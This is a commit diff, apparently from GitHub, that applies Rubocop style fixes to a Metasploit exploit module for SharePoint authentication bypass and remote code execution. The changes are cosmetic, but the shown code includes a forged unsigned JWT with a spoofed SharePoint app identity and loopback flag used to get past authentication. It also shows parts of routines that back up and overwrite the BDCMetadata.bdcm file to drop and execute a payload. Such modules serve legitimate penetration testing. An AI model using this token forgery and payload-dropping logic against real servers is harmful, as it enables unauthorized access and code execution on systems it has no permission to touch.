Rubocop

rapid7 · Feb 6, 2024 · 4bb8714 · 4bb8714
1 parent 326b50b
commit 4bb8714
Showing 1 changed file with 20 additions and 23 deletions.
diff --git a/modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb b/modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb
@@ -78,6 +78,7 @@ def initialize(info = {})
       OptString.new('TARGETURI', [ true, 'The URL of the SharePoint application', '/' ])
     ])
   end
+
   def resolve_target_hostname
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, '_api', 'web'),
@@ -128,19 +129,16 @@ def gen_endpoint_hash(url)
   end
 
   def gen_app_proof_token
-
-    jwt_token1 = "{\"iss\":\"00000003-0000-0ff1-ce00-000000000000\",\"aud\":\"00000003-0000-0ff1-ce00-000000000000@#{@realm}\",\"nbf\":\"1673410334\",\"exp\":\"1725093890\",\"nameid\":\"00000003-0000-0ff1-ce00-000000000000@#{@realm}\", \"ver\":\"hashedprooftoken\",\"endpointurl\": \"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\": 1, \"isloopback\": \"true\"}"
-
     jwt_token2 = {
-      :iss => "00000003-0000-0ff1-ce00-000000000000",
-      :aud => "00000003-0000-0ff1-ce00-000000000000@#{@realm}",
-      :nbf => "1673410334",
-      :exp => "1725093890",
-      :nameid => "00000003-0000-0ff1-ce00-000000000000@#{@realm}",
-      :ver => "hashedprooftoken",
-      :endpointurl => "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=",
-      :endpointurlLength => 1,
-      :isloopback => "true",
+      iss: '00000003-0000-0ff1-ce00-000000000000',
+      aud: "00000003-0000-0ff1-ce00-000000000000@#{@realm}",
+      nbf: '1673410334',
+      exp: '1725093890',
+      nameid: "00000003-0000-0ff1-ce00-000000000000@#{@realm}",
+      ver: 'hashedprooftoken',
+      endpointurl: 'qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=',
+      endpointurlLength: 1,
+      isloopback: 'true'
     }.to_json
 
     # Spacing doesn't matter in JSON yet using jwt_token2 causes a failure unless these spaces are added
@@ -151,7 +149,6 @@ def gen_app_proof_token
 
     b64_token = Rex::Text.encode_base64(jwt_token2)
     "eyJhbGciOiAibm9uZSJ9.#{b64_token}.YWFh"
-
   end
 
   def send_get_request(url)
@@ -177,6 +174,7 @@ def get_current_user
     if res&.code != 200
       raise SharepointInvalidResponseError, 'Failed to get current user'
     end
+
     res.body
   end
 
@@ -202,7 +200,7 @@ def do_auth_bypass
     user_info = get_current_user
     raise SharepointInvalidResponseError, 'Unable to identify the current user' if user_info.nil?
 
-    user_info =~ %r{<d:LoginName>.+?\|(.+)\|.+?<\/d:LoginName>}
+    user_info =~ %r{<d:LoginName>.+?\|(.+)\|.+?</d:LoginName>}
     raise SharepointInvalidResponseError, 'Unable to identify the LoginName of the current user' unless Regexp.last_match(1)
 
     username = Regexp.last_match(1)
@@ -245,7 +243,6 @@ class #{class_name}: System.Web.Services.Protocols.HttpWebClientProtocol{
   end
 
   def drop_and_execute_payload
-
     bdcm_data = "<?xml version=\"1.0\" encoding=\"utf-8\"?>
 <Model
 	xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
@@ -330,13 +327,13 @@ def ensure_target_dir_present
     res = send_get_request('/_api/web/GetFolderByServerRelativeUrl(\'/\')/Folders')
     if res&.code == 200 && res&.body&.include?('BusinessDataMetadataCatalog')
       print_status('BDCMetadata file already present on the remote host, backing it up.')
-        res_bdc_metadata = send_get_request("/_api/web/GetFileByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog/BDCMetadata.bdcm')/$value")
-       if res_bdc_metadata&.code == 200 && !res_bdc_metadata&.body.empty?
-         @backup_bdc_metadata = res_bdc_metadata.body
-         store_bdcmetadata_loot(res_bdc_metadata.body)
-       else
-         print_warning('Failed to backup the existing BDCMetadata.bdcm file')
-       end
+      res_bdc_metadata = send_get_request("/_api/web/GetFileByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog/BDCMetadata.bdcm')/$value")
+      if res_bdc_metadata&.code == 200 && !res_bdc_metadata&.body&.empty?
+        @backup_bdc_metadata = res_bdc_metadata.body
+        store_bdcmetadata_loot(res_bdc_metadata.body)
+      else
+        print_warning('Failed to backup the existing BDCMetadata.bdcm file')
+      end
     else
       body = { 'ServerRelativeUrl' => '/BusinessDataMetadataCatalog/' }
       res_json = send_json_request('/_api/web/folders', body)
@@ -366,7 +363,7 @@ def on_new_session(_session)
   end
 
   def store_bdcmetadata_loot(data)
-    file = store_loot('sharepoint.config', 'text/plain', rhost , data, 'BDCMetadata.bdcm', 'The original BDCMetadata.bdcm file before writing the payload to it')
+    file = store_loot('sharepoint.config', 'text/plain', rhost, data, 'BDCMetadata.bdcm', 'The original BDCMetadata.bdcm file before writing the payload to it')
     print_good("Stored the original BDCMetadata.bdcm file in loot before overwriting it with the payload: #{file}")
   end